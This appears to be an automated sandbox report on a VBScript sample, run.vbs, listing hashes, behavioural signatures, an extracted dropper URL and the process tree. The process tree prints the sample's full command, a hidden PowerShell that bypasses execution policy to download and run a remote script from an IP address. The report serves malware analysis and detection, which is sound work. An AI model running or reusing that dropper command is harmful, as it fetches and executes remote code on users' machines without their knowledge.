Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
06/11/2023, 06:49
Static task
static1
Behavioral task
behavioral1
Sample
run.vbs
Resource
win7-20231020-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
run.vbs
Resource
win10v2004-20231023-en
6 signatures
150 seconds
General
-
Target
run.vbs
-
Size
269B
-
MD5
3dba029327dfd9f7166738e4d851cb8a
-
SHA1
14c8f1078e934ae31a41eac643e9a1cca2ecf0c6
-
SHA256
666131bf5ae20a64b55a835006afae921f20fc23923aeaf0d918ebb4718f8e4e
-
SHA512
39585229250c8d48093fa78f5779d785efbaf41ac5829070f9316f2b95368b940f25d04f0c2a2aa4dac36c71172a9f426ed9dea01a8c7d7bbd01a7b16b943787
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://138.68.134.18/main.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 632 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 632 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2080 wrote to memory of 632 2080 WScript.exe 28 PID 2080 wrote to memory of 632 2080 WScript.exe 28 PID 2080 wrote to memory of 632 2080 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://138.68.134.18/main.ps1')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-